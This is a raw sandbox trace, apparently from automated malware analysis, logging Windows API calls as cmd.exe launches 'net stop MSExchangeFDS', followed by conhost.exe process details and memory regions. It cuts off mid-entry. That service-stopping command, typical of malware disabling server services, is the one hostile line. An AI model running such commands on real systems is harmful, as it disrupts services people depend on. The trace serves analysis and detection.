SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.879] GetEnvironmentStringsW () returned 0x50c7d60* [0135.879] FreeEnvironmentStringsA (penv="A") returned 1 [0135.879] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.879] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.879] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.879] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.879] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.879] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.879] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.879] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.879] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.879] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.879] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4d6f668 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0135.879] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4d6f668, lpFilePart=0x4d6f660 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4d6f660*="Desktop") returned 0x1d [0135.879] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0135.879] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4d6f3e8 | out: lpFindFileData=0x4d6f3e8) returned 0x50c05c8 [0135.879] FindClose (in: hFindFile=0x50c05c8 | out: hFindFile=0x50c05c8) returned 1 [0135.880] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4d6f3e8 | out: lpFindFileData=0x4d6f3e8) returned 0x50c05c8 [0135.880] FindClose (in: hFindFile=0x50c05c8 | out: hFindFile=0x50c05c8) returned 1 [0135.880] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0135.880] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4d6f3e8 | out: lpFindFileData=0x4d6f3e8) returned 0x50c05c8 [0135.880] FindClose (in: hFindFile=0x50c05c8 | out: hFindFile=0x50c05c8) returned 1 [0135.880] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0135.880] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0135.880] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0135.880] GetEnvironmentStringsW () returned 0x50c7d60* [0135.880] FreeEnvironmentStringsA (penv="=") returned 1 [0135.880] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0135.880] GetConsoleOutputCP () returned 0x1b5 [0135.881] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0135.881] GetUserDefaultLCID () returned 0x409 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4d6f798, cchData=128 | out: lpLCData="0") returned 2 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4d6f798, cchData=128 | out: lpLCData="0") returned 2 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4d6f798, cchData=128 | out: lpLCData="1") returned 2 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0135.881] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0135.881] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.882] GetConsoleTitleW (in: lpConsoleTitle=0x50ca9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.882] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0135.883] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0135.883] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0135.883] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0135.883] _wcsicmp (_String1="net", _String2=")") returned 69 [0135.883] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0135.883] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0135.883] _wcsicmp (_String1="IF", _String2="net") returned -5 [0135.883] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0135.883] _wcsicmp (_String1="REM", _String2="net") returned 4 [0135.883] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0135.884] GetConsoleTitleW (in: lpConsoleTitle=0x4d6f480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.884] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0135.884] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0135.884] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0135.884] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0135.884] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0135.884] _wcsicmp (_String1="net", _String2="CD") returned 11 [0135.884] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0135.884] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0135.884] _wcsicmp (_String1="net", _String2="REN") returned -4 [0135.884] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0135.884] _wcsicmp (_String1="net", _String2="SET") returned -5 [0135.884] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0135.884] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0135.884] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0135.884] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0135.884] _wcsicmp (_String1="net", _String2="MD") returned 1 [0135.885] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0135.885] _wcsicmp (_String1="net", _String2="RD") returned -4 [0135.885] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0135.885] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0135.885] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0135.885] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0135.885] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0135.885] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0135.885] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0135.885] _wcsicmp (_String1="net", _String2="VER") returned -8 [0135.885] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0135.885] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0135.885] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0135.885] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0135.885] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0135.885] _wcsicmp (_String1="net", _String2="START") returned -5 [0135.885] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0135.885] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0135.885] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0135.885] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0135.885] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0135.885] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0135.885] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0135.885] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0135.885] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0135.885] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0135.885] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0135.885] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0135.885] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0135.885] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0135.885] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0135.885] _wcsicmp (_String1="net", _String2="CD") returned 11 [0135.885] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0135.885] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0135.885] _wcsicmp (_String1="net", _String2="REN") returned -4 [0135.885] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0135.885] _wcsicmp (_String1="net", _String2="SET") returned -5 [0135.885] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0135.885] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0135.885] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0135.885] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0135.885] _wcsicmp (_String1="net", _String2="MD") returned 1 [0135.885] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0135.885] _wcsicmp (_String1="net", _String2="RD") returned -4 [0135.885] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0135.885] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0135.885] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0135.885] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0135.885] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0135.885] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0135.885] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0135.885] _wcsicmp (_String1="net", _String2="VER") returned -8 [0135.885] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0135.885] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0135.885] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0135.886] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0135.886] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0135.886] _wcsicmp (_String1="net", _String2="START") returned -5 [0135.886] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0135.886] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0135.886] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0135.886] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0135.886] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0135.886] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0135.886] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0135.886] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0135.886] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0135.886] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0135.886] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0135.886] _wcsicmp (_String1="net", _String2="IF") returned 5 [0135.886] _wcsicmp (_String1="net", _String2="REM") returned -4 [0135.886] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0135.886] SetErrorMode (uMode=0x0) returned 0x0 [0135.886] SetErrorMode (uMode=0x1) returned 0x0 [0135.886] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x50c05d0, lpFilePart=0x4d6ef8c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4d6ef8c*="Desktop") returned 0x1d [0135.886] SetErrorMode (uMode=0x0) returned 0x1 [0135.886] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0135.886] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.894] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0135.894] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0135.894] GetConsoleTitleW (in: lpConsoleTitle=0x4d6f20c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.894] InitializeProcThreadAttributeList (in: lpAttributeList=0x4d6f138, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4d6f11c | out: lpAttributeList=0x4d6f138, lpSize=0x4d6f11c) returned 1 [0135.894] UpdateProcThreadAttribute (in: lpAttributeList=0x4d6f138, dwFlags=0x0, Attribute=0x60001, lpValue=0x4d6f124, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4d6f138, lpPreviousValue=0x0) returned 1 [0135.895] GetStartupInfoW (in: lpStartupInfo=0x4d6f170 | out: lpStartupInfo=0x4d6f170*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.895] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.895] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0135.896] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeFDS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4d6f0c0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeFDS", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4d6f10c | out: lpCommandLine="net stop MSExchangeFDS", lpProcessInformation=0x4d6f10c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xed4, dwThreadId=0xec4)) returned 1 [0135.903] CloseHandle (hObject=0xa4) returned 1 [0135.903] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0135.903] GetEnvironmentStringsW () returned 0x50c9ec8* [0135.903] FreeEnvironmentStringsA (penv="=") returned 1 [0135.903] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0136.032] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4d6f0a4 | out: lpExitCode=0x4d6f0a4*=0x2) returned 1 [0136.032] CloseHandle (hObject=0xa8) returned 1 [0136.032] _vsnwprintf (in: _Buffer=0x4d6f18c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4d6f0ac | out: _Buffer="00000002") returned 8 [0136.032] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0136.032] GetEnvironmentStringsW () returned 0x50cb3a8* [0136.032] FreeEnvironmentStringsA (penv="=") returned 1 [0136.032] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0136.032] GetEnvironmentStringsW () returned 0x50cb3a8* [0136.032] FreeEnvironmentStringsA (penv="=") returned 1 [0136.032] DeleteProcThreadAttributeList (in: lpAttributeList=0x4d6f138 | out: lpAttributeList=0x4d6f138) [0136.032] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.032] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0136.033] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.033] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0136.033] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.033] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0136.033] SetConsoleInputExeNameW () returned 0x1 [0136.033] GetConsoleOutputCP () returned 0x1b5 [0136.033] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0136.033] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.033] exit (_Code=2) Thread: id = 617 os_tid = 0xeb4 Process: id = "198" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x29596000" os_pid = "0xe88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "197" os_parent_pid = "0xe84" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9970 start_va = 0x7f9d2000 end_va = 0x7f9d2fff entry_point = 0x0 region_type = private name = "private_0x000000007f9d2000" filename = "" Region: id = 9971 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9972 start_va = 0xd7c6860000 end_va = 0xd7c687ffff entry_point = 0x0 region_type = private name = "private_0x000000d7c6860000" filename = "" Region: id = 9973 start_va = 0xd7c6880000 end_va = 0xd7c6893fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d7c6880000" filename = "" Region: id = 9974 start_va = 0xd7c68a0000 end_va = 0xd7c68dffff entry_point = 0x0 region_type = private name = "private_0x000000d7c68a0000" filename = "" Region: id = 9975 start_va = 0x7df5ff030000 end_va = 0x7ff5ff02ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff030000" filename = "" Region: id = 9976 start_va = 0x7ff6c42a0000 end_va = 0x7ff6c42c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42a0000" filename = "" Region: id = 9977 start_va = 0x7ff6c42cd000 end_va = 0x7ff6c42cefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c42cd000" filename = "" Region: id = 9978 start_va = 0x7ff6c42cf000 end_va = 0x7ff6c42cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c42cf000" filename = "" Region: id = 9979 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9980 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9981 start_va = 0xd7c6860000 end_va = 0xd7c686ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d7c6860000" filename = "" Region: id = 9982 start_va = 0xd7c6870000 end_va = 0xd7c6876fff entry_point = 0x0 region_type = private name = "private_0x000000d7c6870000" filename = "" Region: id = 9983 start_va = 0xd7c68e0000 end_va = 0xd7c699dfff entry_point = 0xd7c68e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9984 start_va = 0xd7c69a0000 end_va = 0xd7c69dffff entry_point = 0x0 region_type = private name = "private_0x000000d7c69a0000" filename = "" Region: id = 9985 start_va = 0xd7c69e0000 end_va = 0xd7c6adffff entry_point = 0x0 region_type = private name = "private_0x000000d7c69e0000" filename = "" Region: id = 9986 start_va = 0xd7c6ae0000 end_va = 0xd7c6ae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d7c6ae0000" filename = "" Region: id = 9987 start_va = 0xd7c6af0000 end_va = 0xd7c6afffff entry_point = 0x0 region_type = private name = "private_0x000000d7c6af0000" filename = "" Region: id = 9988 start_va = 0xd7c6b00000 end_va = 0xd7c6b06fff entry_point = 0x0 region_type = private name = "private_0x000000d7c6b00000" filename = "" Region: id = 9989 start_va = 0xd7c6b10000 end_va = 0xd7c6c97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d7c6b10000" filename = "" Region: id = 9990 start_va = 0xd7c6ca0000 end_va = 0xd7c6e20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d7c6ca0000" filename = "" Region: id = 9991 start_va = 0xd7c6e30000 end_va = 0xd7c822ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d7c6e30000" filename = "" Region: id = 9992 start_va = 0xd7c8230000 end_va = 0xd7c8230fff entry_point = 0x0 region_type = private name = "private_0x000000d7c8230000" filename = "" Region: id = 9993 start_va = 0xd7c8240000 end_va = 0xd7c8240fff entry_point = 0x0 region_type = private name = "private_0x000000d7c8240000" filename = "" Region: id = 9994 start_va = 0x7ff6c41a0000 end_va = 0x7ff6c429ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41a0000" filename = "" Region: id = 9995 start_va = 0x7ff6c42cb000 end_va = 0x7ff6c42ccfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c42cb000" filename = "" Region: id = 9996 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9997 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9998 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9999 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10000 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10001 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10002 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10003 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10004 start_va = 0x7ffc02100000 end_va = 